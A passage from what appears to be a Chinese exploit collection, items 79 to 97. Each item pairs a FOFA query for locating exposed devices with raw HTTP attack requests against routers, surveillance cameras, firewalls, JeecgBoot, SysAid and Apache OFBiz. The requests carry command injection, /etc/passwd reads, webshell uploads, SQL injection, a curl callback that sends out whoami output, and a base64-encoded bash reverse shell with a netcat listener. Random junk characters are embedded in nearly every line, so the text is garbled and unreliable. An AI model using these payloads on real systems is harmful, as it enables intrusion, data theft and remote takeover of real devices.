3 b) T- `9 `6 X) Y5 X; n, \* YContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"0 T1 e  J3 p. ~! Y" z8 L$ j2 j
Content-Type: image/png
; k7 I2 @  \8 d2 m, n, ]
& {8 X* H: f) |2 LYsOxWxSvj1KyZow1PTsh98fdu6l
% U$ v" k: G+ b( `( U* c1 D------YsOxWxSvj1KyZow1PTsh98fdu6l4 l1 y: _. T+ L$ p0 m  B& W
Content-Disposition: form-data; name="target"% t. O. N/ J3 U2 A
/ K! R+ _% {# f# T1 M
/Applications/SkillDevelopAndEHS/1 v( i, _0 `3 R
------YsOxWxSvj1KyZow1PTsh98fdu6l--1 b1 L+ P9 P8 j, z, x2 @( v# ~

: _4 k. W# C3 _3 O8 L! t
  _8 F, _7 g) q  ]6 r0 mGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1( B4 |* o- M' F, d8 U2 j4 ]% g
Host: x.x.x.x
7 M; A& ?4 E: F& ?% w+ H& l
! @6 c: t7 c$ R9 z& z# h
$ _) N* {( z8 @* k79. BYTEVALUE 百为流控路由器远程命令执行0 O& n& x# ~) [1 d6 d8 {0 r
FOFA:BYTEVALUE 智能流控路由器
& r/ ]3 A- G9 _1 R; K0 r$ FGET /goform/webRead/open/?path=|id HTTP/1.1
8 O% v4 _+ h( f+ |& XHost:IP
: C# m1 e1 u8 ^! w* M" ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.03 M' k+ x' {+ @7 c5 I& H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) M: y  s& \1 F7 J$ N. w4 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 j$ @" h& W9 ~- G. p0 T& c: eAccept-Encoding: gzip, deflate! v0 P) c! |* L
Connection: close
+ p. c# \1 \; xUpgrade-Insecure-Requests: 1  n( p; x# T  Y6 ^

$ l5 R* n1 C+ G0 g  t3 f9 e: u) j, k6 \5 [5 T& M8 l
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
: {3 B8 D" V) x1 w- Q4 lFOFA:app="速达软件-公司产品"0 e: P! _: J# `8 A
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1" }1 T# _2 L1 B" `* \* K
Host: x.x.x.x
/ O3 G/ ]% Y* N/ h  `( xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 m: M5 {  T6 [
Content-Length: 27! Z6 _" U" q! v5 G9 E0 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. s3 z1 G6 P  f% F4 CAccept-Encoding: gzip, deflate
: B/ \% x! A& ]1 \& rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 p; z4 z+ J2 B/ k3 m
Connection: close
! Z( c8 e* G( L; c  dContent-Type: application/octet-stream
. m5 T7 C' [, }5 H! v( ]Upgrade-Insecure-Requests: 1: ~2 q- v% k2 n. y5 i; b2 n7 D

8 k1 [# ^- i: P: n4 L; b<% out.print("oessqeonylzaf");%>
3 ^) N4 \3 x- f+ T' a% E: o+ J5 ]/ Q% W
& V% n( [0 k( Y5 W% l+ |$ O
GET /xykqmfxpoas.jsp HTTP/1.1
0 Z  r& ]% k# W( m8 E3 ^; fHost: x.x.x.x
" S0 \) b3 Y* l4 B  LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15  \; b) p' I! m
Connection: close) l/ W4 x9 S( V! @, a7 `( \, {7 x
Accept-Encoding: gzip* i5 b7 G- A* X- ~( j4 q

1 e4 `0 \4 n7 I. {% `& I, t5 [* q9 K9 N$ Y/ I0 P  m
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
2 X$ s. K& {3 mFOFA:app="uniview-视频监控"/ T& |( S) i' W6 X) E5 S! Z
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
3 \( V: }9 a- y, w+ q1 oHost: x.x.x.x1 v% q1 q) O+ z# q# p7 f5 o% V0 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# j& g- N, E  k. v/ Y
Connection: close+ C( w0 M% P6 V: M* C
Accept-Encoding: gzip3 G$ S, f, Y8 G; z% E
; g! b+ `6 B- d  a
& e7 L) L# r( J  s7 W7 ]+ t
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行8 s% F8 z4 B, k4 }+ T
FOFA:app="思福迪-LOGBASE"8 m9 j5 @7 [8 w  r" y1 j6 R
POST /bhost/test_qrcode_b HTTP/1.1
# l  x& _7 ]3 l( J8 fHost: BaseURL9 E& v; [8 i+ t& k! @' P% Q
User-Agent: Go-http-client/1.1
$ t  J0 N' S3 ZContent-Length: 23# v( G/ H% B+ D5 [1 H( O
Accept-Encoding: gzip0 \; X5 S/ J0 y- e
Connection: close9 H2 b" l. ^' K" w6 i2 z2 f0 f
Content-Type: application/x-www-form-urlencoded
" j: m' |: P# |. D) ^& y! W( iReferer: BaseURL
: ^) J- v  C9 B# b* U6 O
, n- ]1 k. G$ K7 \1 A6 L3 @* `- Bz1=1&z2="|id;"&z3=bhost
0 B" X- T  E- `& m/ B$ p7 J) K* C4 F# T7 m( d* G( [

1 e8 T2 C+ n* r! |83. JeecgBoot testConnection 远程命令执行" z6 G* w8 A% c4 q
FOFA:title=="JeecgBoot 企业级低代码平台"
' A4 s) _  q, M% W1 ]2 b
/ V0 c5 I: [, m& B9 O6 \
- s+ m: g( Y! _POST /jmreport/testConnection HTTP/1.1  ?. u" `5 S4 f( x  n
Host: x.x.x.x
8 F" ?/ g0 @& B6 h2 g1 W) Q+ l, ^! pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% Q$ o2 C  G1 {6 }% J" U/ k; g
Connection: close( k8 g' _% X) C+ {0 w( `/ t
Content-Length: 8881) Y. U1 K# l& J4 D5 @
Accept-Encoding: gzip
- ^6 H" s8 b- s0 J+ @! ?( pCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"9 V% |3 n1 I! y: K- B4 q
Content-Type: application/json
! T0 Y; O( ?3 q/ I+ ?# I4 v# b& w8 E3 ]4 v0 n/ Z/ R
PAYLOAD
3 q  C! j0 A& Q2 C$ ~5 @( {% ]) ?8 O
* z5 X1 m; w2 _% D- [8 x84. Jeecg-Boot JimuReport queryFieldBySql 模板注入) G. J2 |8 E3 h+ ~
FOFA:title=="JeecgBoot 企业级低代码平台"
; d+ _) O3 B+ ~9 A. l* B0 F
) L' {7 U% j; n5 c! h
% r2 f& n1 k7 C% v- Z
* G1 z6 |# n2 D7 }2 |, O) K- E3 ePOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
  `" {& M/ {. [8 D- gHost: 192.168.40.130:8080
# O2 Y4 i6 c9 h+ c+ ~User-Agent: curl/7.88.1
, X6 D5 f+ o# dContent-Length: 156
& N. N- _1 r  c, x$ @0 Q9 V  Z7 SAccept: */*
$ C) f" _( L' g6 @7 W% cConnection: close* f& D+ c; a# A; u9 l1 I0 n
Content-Type: application/json
2 E  u4 x2 t+ M2 P& MAccept-Encoding: gzip+ s  Z9 J; H9 K
! J2 K, s" `1 g
{
) }4 l( |$ w# h% b4 {# o "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",- b1 z" s5 D' H. K
  "type": "0"
5 c7 [+ _' }: `; R}
0 A! Z# {# N9 x2 o" O& X7 I6 ~2 M$ S, L  t& a$ w+ y9 S

) f( J2 r' k. r) A85. SysAid On-premise< 23.3.36远程代码执行7 [1 d2 W' Y8 q4 z1 z
CVE-2023-472468 b  ^. Q; p3 N2 e9 ]6 W4 A$ P
FOFA:body="sysaid-logo-dark-green.png"
7 }  C) t) [2 W4 ]EXP数据包如下,注入哥斯拉马
. k  e+ c) J1 b( r) B3 B: `! X4 I) s9 rPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
0 q1 z$ V* Q0 v3 b; y4 N6 YHost: x.x.x.x: d0 s" `3 Q( Q& z. m* R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 ]  m# V8 q( @/ x+ k# d
Content-Type: application/octet-stream
% B0 M2 K  a  m0 MAccept-Encoding: gzip# g& t  ^9 H" J' G9 u

. _) _9 Z6 f, n& u' X) A, y% [1 q, ~PAYLOAD- p" u3 P7 q& z) L
5 ~# N# K" q" Q- x0 y1 T
回显URL:http://x.x.x.x/userfiles/index.jsp
% z! t/ i! d  D/ F$ j6 Q0 L/ ]  P! k/ M+ |
86. 日本tosei自助洗衣机RCE# U7 X9 C; T* r; A1 T
FOFA:body="tosei_login_check.php"
2 V. k7 a- C. ePOST /cgi-bin/network_test.php HTTP/1.1' q3 y+ A  d& G
Host: x.x.x.x/ {4 }/ G$ k1 h/ A+ d. _' |
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36; w  E- P. m; m. D2 p0 l- {! P" ?
Connection: close
( ~& ]5 U+ U$ S, O' r$ h6 bContent-Length: 447 k. z  p2 x: D! i
Accept: */*$ \- r& O$ n9 N
Accept-Encoding: gzip1 g* t" V% J9 w" T6 N. a. x7 ^
Accept-Language: en  h% m2 A* @% A# d4 b; ^
Content-Type: application/x-www-form-urlencoded2 V" d( v2 A0 l% r( y4 e" \
% i8 f3 P( {2 P" Z! B& a4 i/ F- S
host=%0acat${IFS}/etc/passwd%0a&command=ping
8 V6 G1 x- v" {2 A+ K
" L( O( E( Q- ~1 b0 Y0 g
# s, z# c) v+ {: i& ?! s- f" S7 b87. 安恒明御安全网关aaa_local_web_preview文件上传
* E2 s7 I$ k1 R3 a4 R1 g) o. c% ~) NFOFA:title="明御安全网关"
) c! G' U' X  y' iPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
9 }8 |7 ]9 A% `6 ^3 _Host: X.X.X.X0 m, V' M# T) i& E% ~' Z8 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% b: `) u4 L' C; _2 e( }' @
Connection: close
/ r! `9 m; ^$ |0 CContent-Length: 198
: F/ y# s1 h" r% _" }2 FAccept-Encoding: gzip: b& S# b$ E. P/ s. ]2 U! \" z; F
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
% J/ R/ S( s5 J* Z  o6 f9 `5 D/ l9 ]* j/ P8 t; W
--qqobiandqgawlxodfiisporjwravxtvd7 H' D5 Z9 t$ C
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
1 [1 I% X- y. E$ y0 |$ JContent-Type: text/plain/ _# `$ Z- @2 b8 f% f! x. D

1 ^; y, f' x+ j' h$ O$ U2ZqGNnsjzzU2GBBPyd8AIA7QlDq3 G* M+ T5 D! h9 w7 G
--qqobiandqgawlxodfiisporjwravxtvd--
' C6 [8 S0 S" C( T/ A
/ p; @5 _, T9 }/ S' J( O0 P
6 z. D6 x& I* m3 `) b/ {1 ?7 b8 i/jfhatuwe.php
$ Y/ K. s1 h/ B6 t0 X  ^9 h6 N4 c8 q' U& V4 ]2 O5 R( c6 s
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
8 c! ]/ J2 q5 z- l5 w4 M& Z# D' nFOFA:title="明御安全网关"4 y' O+ k, y) \) s. T1 a! C
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.11 R* o+ i% p/ g; _, p' a2 w
Host: x.x.x.xx.x.x.x
1 X) s& _; r) a$ N  M3 v: \& dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 p1 m9 V$ J" s1 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 \" v* I! W  E+ h1 @2 zAccept-Encoding: gzip, deflate
% \$ u0 i7 s# [! b  b6 y2 q- ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 z. m# K+ G8 l
Connection: close
' D0 k. e1 h+ K+ n0 R8 C# e7 t
1 T/ b4 @# T, t6 C- Q0 T+ D* K( x/ B
/astdfkhl.php$ H% h3 w4 _$ H. Z  q6 i

9 I" b' D' L  p. v# a; q8 I1 ?4 e89. 致远互联FE协作办公平台editflow_manager存在sql注入
1 E, M( r9 r  bFOFA:title="FE协作办公平台" || body="li_plugins_download"
" n" L  E4 ~9 B  @0 qPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
7 u! G' U6 {& H& vHost: x.x.x.x
+ a: @& V& c: }3 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 t! P/ _6 d" K
Connection: close
. K4 v' T0 j' i% t8 i, u3 dContent-Length: 41$ S/ K* t5 V) f; g
Content-Type: application/x-www-form-urlencoded
+ @7 H5 _) E- h3 @& ^( Q2 i+ u/ HAccept-Encoding: gzip! Q& R/ J; T8 s2 ?

. }5 d5 F2 c; O/ Y$ w  Poption=2&GUID=-1'+union+select+111*222--+
' K; y' J' N9 ~4 V) H" R2 i8 P, {
; }- O8 _5 J9 ]- Q) W; _
8 g3 _- ]9 D8 p; S( [90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行# ]- S& P, t) P$ F" F
FOFA:icon_hash="-1830859634"7 _2 _$ P1 n- X  N5 a# Z7 t
POST /php/ping.php HTTP/1.1
. X# ]8 K( j$ v% L9 oHost: x.x.x.x
+ Q( O8 y9 ?" n+ k* Q$ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.09 C: A2 J( p  N# H7 j
Content-Length: 51' b$ x8 K6 e( Q9 ~0 J1 B
Accept: application/json, text/javascript, */*; q=0.01
, P9 m- a+ e  d( ?1 K0 d% _2 \Accept-Encoding: gzip, deflate3 D8 y. [: s. e! q& M* W' G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  z7 _' V; U+ }0 \3 _5 ]
Connection: close2 @& ?- R1 h5 |0 T1 U; {; l
Content-Type: application/x-www-form-urlencoded
" \8 O4 Y/ i" d4 ]( P/ P9 o1 M4 mX-Requested-With: XMLHttpRequest6 u5 n: h# p* n% \, e

" n7 U# k7 g+ q: i3 Ujsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig. v; R6 y; Z$ B$ K4 O& y/ a

. [+ M, u5 W) n( U3 g4 J4 h$ U& _- {
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
/ y' J, k+ W2 T3 X) q' JFOFA:title="综合安防管理平台"
, \& K( W( S" O% e. Z( Z* Z/ rGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
' n" r( s  Z, [8 a; h' ^3 e+ ?Host: your-ip
' Q8 S! R/ q5 E# `: q7 |8 M& kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.365 T  F' M" T3 \" o0 B: |
Accept-Encoding: gzip, deflate0 c. t% G- F  c- u2 l, S- u1 b
Accept: */*
$ A( C0 l9 [4 l* D, z' zConnection: keep-alive
- J! [! _% F* @5 X/ J
& b& W) X: T* O; T/ r1 w- Z
4 }6 t- q9 F. H" ]1 N6 Q% e& S; N' P: {
92. 海康威视运行管理中心session命令执行
* y, I& f- C' |5 d  O! `" qFastjson命令执行
- \  J, k( R( H4 d& a1 u7 Fhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"/ L& d7 {3 n0 K- j& O
POST /center/api/session HTTP/1.1& ?! J8 f; ~3 C2 E: a9 Z
Host:
; S8 Y) }& B  `Accept: application/json, text/plain, */*7 T( J( u$ j8 g. ?. i" U8 S! E/ a
Accept-Encoding: gzip, deflate
9 O6 X3 X" J/ @X-Requested-With: XMLHttpRequest! P" k; {4 k1 L6 a. R$ Z* D
Content-Type: application/json;charset=UTF-89 N0 ]% k, A% K3 N9 Z
X-Language-Type: zh_CN
* G  C: C) Z: |0 Y+ `8 VTestcmd: echo test
/ l; w3 Z( `# l! c  F, S+ q& M; NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
, c% @' Q( [, F$ H( L! ^Accept-Language: zh-CN,zh;q=0.9/ G4 w% A9 r5 `- ]. Y" V+ k8 Z$ Y
Content-Length: 57780 B7 e3 A! r( e; E, v

! I% Y! B9 X  |. J, q# p9 E! h0 y8 ?PAYLOAD' @* N/ h7 v/ O& d- i7 D! N

( i/ t/ }9 u9 C( t6 \+ D2 ^9 i
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
  q! O' K+ S0 f* ^% EFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
* L/ o9 K3 D" hPOST /?g=app_av_import_save HTTP/1.1
. @6 e1 l' L" C: F3 xHost: x.x.x.x
0 E$ S5 f: @9 J/ @* f1 R* ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
2 x( D: `( H7 _) T8 W% q' D" hUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, r: ~5 m9 ?0 a( I" t/ p/ g& u

5 h3 C0 F& p5 H1 `4 c) [0 F0 }: ~5 D------WebKitFormBoundarykcbkgdfx6 m; y5 @% Z- X( D; a
Content-Disposition: form-data; name="MAX_FILE_SIZE"
( D8 M- o* O9 H# Q, K8 @9 J/ P; D9 c% m( _
10000000( a6 K4 K6 I& p- @& V) }3 a0 m
------WebKitFormBoundarykcbkgdfx
, s, Y' z+ t: }- B' hContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
& Q& o: v6 C& N& e( gContent-Type: text/plain# h. u6 l% H( g" y+ J! {

+ d1 r; I' M" r2 U$ wwagletqrkwrddkthtulxsqrphulnknxa
" l' t9 W1 A7 J( Z- y------WebKitFormBoundarykcbkgdfx" f/ y: r. ?4 ^; N6 y3 z
Content-Disposition: form-data; name="submit_post"; V, Z' M3 I( y" \
# b8 F$ t! M0 f9 t4 K7 }! v$ q
obj_app_upfile5 N/ C5 ~, Z' t- s4 B4 _5 A% C
------WebKitFormBoundarykcbkgdfx  x% d0 P# j$ _& d
Content-Disposition: form-data; name="__hash__"; i: ?" G* r  g7 n# E, g9 _. l" [
+ B+ k7 [9 ^* P
0b9d6b1ab7479ab69d9f71b05e0e9445
0 y, S* B$ U8 U) u; ^6 f------WebKitFormBoundarykcbkgdfx--& U/ O! I) C/ X; G

3 C  J5 d6 ^6 `" t
8 C9 i4 m! D# e+ `) TGET /attachements/xlskxknxa.txt HTTP/1.1% c  x9 X+ }8 T5 j$ W
Host: xx.xx.xx.xx1 h# ?( h  h$ A4 t) e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 x+ F/ r$ d* t/ ~: W& l* l% H( _* y1 _7 B3 z6 j% ~( i8 g9 R
! R: a( l' L  x, _8 l0 l, q
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
6 A. p5 L2 C! y, ]FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
" ^7 E5 v9 `+ m; wPOST /?g=obj_area_import_save HTTP/1.1
4 Y9 G4 H6 H8 I) BHost: x.x.x.x, Z8 F' [4 Q( s/ _) ?4 u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
. T. P6 v! l/ b$ U0 M5 F, j& _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( s. y* [1 S; W
  k# q' t; y5 {" Z! F3 j------WebKitFormBoundarybqvzqvmt/ Y/ R1 v9 ^( A+ O# J
Content-Disposition: form-data; name="MAX_FILE_SIZE"
3 c7 g# U/ F& f3 ^: J) A
; v) f+ q3 Z9 X/ i- e0 g  C10000000
" {2 K) j0 x* x4 P5 i5 V------WebKitFormBoundarybqvzqvmt% g/ I) [) Z' z3 ^, M; R* P
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"" X- c9 |) r- F1 T! J) I4 Y& b
Content-Type: text/plain
9 ]/ y( @/ `/ ~* f, {  Z
, X/ z% h, j+ |( q2 S1 Qpxplitttsrjnyoafavcajwkvhxindhmu
, O8 @& [1 n4 B5 u2 `------WebKitFormBoundarybqvzqvmt0 N0 W$ R8 s: k  v& z
Content-Disposition: form-data; name="submit_post"( s* l8 }' C' V( S

6 {8 {& n  E. w% h9 zobj_app_upfile
* ~0 y3 O( w9 C( x------WebKitFormBoundarybqvzqvmt- ?& `* M% F4 K1 ?8 W
Content-Disposition: form-data; name="__hash__"- s. n7 g( X) k+ p
4 p+ Z$ j) Y- K1 ?4 ]/ i
0b9d6b1ab7479ab69d9f71b05e0e9445- @& `; o$ x/ Y1 n
------WebKitFormBoundarybqvzqvmt--/ _" w- n6 |2 v! S

8 c& I' H" R: R$ D) H6 T7 K4 E9 \' G4 f, p4 W0 `# Y7 E

; B( J& M. H9 m( \GET /attachements/xlskxknxa.txt HTTP/1.1
, v! F. v3 ?8 U, b/ n; oHost: xx.xx.xx.xx
: I9 z+ t$ o2 {2 I/ n, WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 z# V9 T! a3 F6 N: \: z

4 f2 {# p) l% E' X5 d( G+ z: K! D) _7 y& W9 q
8 r6 M, o1 W# {2 {$ P2 `
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
( Z8 w3 L8 u& ^* lCVE-2023-490702 ^) q. p) k' F! L- x
FOFA:app="Apache_OFBiz"( V8 x1 `- x/ }
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
$ }5 H1 U) t: h3 kHost: x.x.x.x: G' U8 H" c4 f% s3 w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
5 x4 ?: Y$ z* {Connection: close
4 R0 h1 }& p3 i+ K2 z- Y+ ?Content-Length: 8892 A$ y$ K" I3 s* s
Content-Type: application/xml
4 A1 b1 m: W, H9 @& L* u' B9 fAccept-Encoding: gzip
2 N5 K$ U: _* O# d5 b: }. e$ z! {1 A' c. u. V6 r* {$ K: G+ |1 R
<?xml version="1.0"?>+ N! b% w6 T( X% k" ]# [
<methodCall>5 w- _) i: j+ D9 Q
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>$ F0 b! K, g" ^) T" R" b0 q5 I$ \
    <params>: W" ~5 v3 G% B  j
      <param>' f! e; `/ C3 {  D6 c. M
      <value>
6 h2 E, @1 [, J0 L+ T, e) \( X* e, q3 g        <struct>! [4 T; b! b  k! M" l$ U: I
       <member>
) f" H8 |0 t: I6 O1 c          <name>test</name>1 w7 ^, a3 H0 h0 X% `4 I6 f
          <value>
  V9 I% ?0 f$ S5 m' `      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>; H1 _- b2 M- w( L" M
          </value>
0 a8 O7 u1 e- P& `- W0 e  `) g        </member>
( I9 C0 Z$ u" m# v8 W      </struct>
7 s  K  R# h  }3 l9 X4 m      </value>
+ d1 E5 }9 F' i- m1 d8 Y) Y1 W# j    </param>+ o& ~  H" M: `4 G$ u9 o7 Q
    </params>  y: I( L& m: o5 A7 \
</methodCall>
. a1 h& @( |& P" i
7 Q) o  E3 H* z& ^! ?" \1 L4 K1 O3 G- U: H5 [
用ysoserial生成payload
, s  |8 h# i3 r; ], Z. A- V4 pjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"$ e0 R: r( i  F
1 v, U- r' |; @1 y8 O& E, G2 {

1 T$ P: N- K* l3 @" n% o/ H2 L将生成的payload替换到上面的POC, T4 A+ N+ h$ Z
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1& s% e- f) T5 a
Host: 192.168.40.130:8443. x9 C0 p  \7 b9 E5 j/ w) ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.361 \# D  d3 [& ^, f' T' d
Connection: close
" A% m+ b" w9 O, C: rContent-Length: 8890 d! W2 ]. R/ L( R8 \- P' I
Content-Type: application/xml- d: `0 A0 `! [- y! e1 g5 F
Accept-Encoding: gzip& g- \/ _8 O5 t
9 f  W6 O2 X/ N/ I/ X
PAYLOAD
' `0 K" c' {$ d
  T7 t/ c& ~6 v0 i96. Apache OFBiz  18.12.11 groovy 远程代码执行
8 W& k" K# d8 \7 Q7 FFOFA:app="Apache_OFBiz"
/ {2 Q/ ^$ Z1 EPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
) |/ o$ ~; N7 Z! d) FHost: localhost:84430 j* Y3 @9 U  c8 A7 S) j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' M* }3 R+ R4 d2 G: @3 S
Accept: */*
: l( \8 l; x1 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  U- ]1 w% o+ t8 z
Content-Type: application/x-www-form-urlencoded8 X8 g0 u$ Z  W  u9 P" F  m* G6 i
Content-Length: 55, D# }& N4 c$ y4 g1 E, y7 \( Y! Y
9 ]6 U& j+ h. W
groovyProgram=throw+new+Exception('id'.execute().text);- i. c1 C3 N+ T2 Z
: ]* ?* y" f6 l

# o8 u* z, U6 ?) d' _! c反弹shell
0 _* r5 U- D& P5 c在kali上启动一个监听
3 S8 C) V( l+ A( p5 anc -lvp 7777
, ^" n% y9 z) W6 X! w1 S6 R$ S7 A/ c+ r+ O
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
, @8 u/ V% k) j: [. qHost: 192.168.40.130:84436 d1 q& d2 G7 m5 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
0 l" v$ L5 _* }7 KAccept: */*
* W3 b- |2 Z4 ^$ ?- {, C" `, nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( n' }$ C% H' E; ~* r$ q
Content-Type: application/x-www-form-urlencoded
& l% `# X' |5 HContent-Length: 716 w" G) W# J8 {  q- B$ y  h- g

% }: F2 s6 j& O% sgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();8 w; k+ O5 c; l: L0 s
$ H0 w2 M! A; L+ r
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行+ z9 M9 N0 P* a1 U: u) r) L
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"$ M1 h9 p( a: m
GET /passport/login/ HTTP/1.17 g* U' p: L+ ?& k  ^& }+ Q
Host: 192.168.40.130:8085
2 c+ ~* i- O9 `9 r) f3 m. o% XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! k8 T9 ]" ?1 b8 r3 n4 H
Accept-Encoding: gzip8 f3 C4 V) ?  ~. M3 f2 E
Connection: close
0 I4 A& J( a( K% W& F& V3 @4 ZCookie: rememberMe=PAYLOAD8 Q( ^& \% I. s* C  B
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"9 x' _: l5 J6 E: u# l& Y

2 G0 F; e1 O4 j! h: i" q) V0 ]# y% E/ U- E
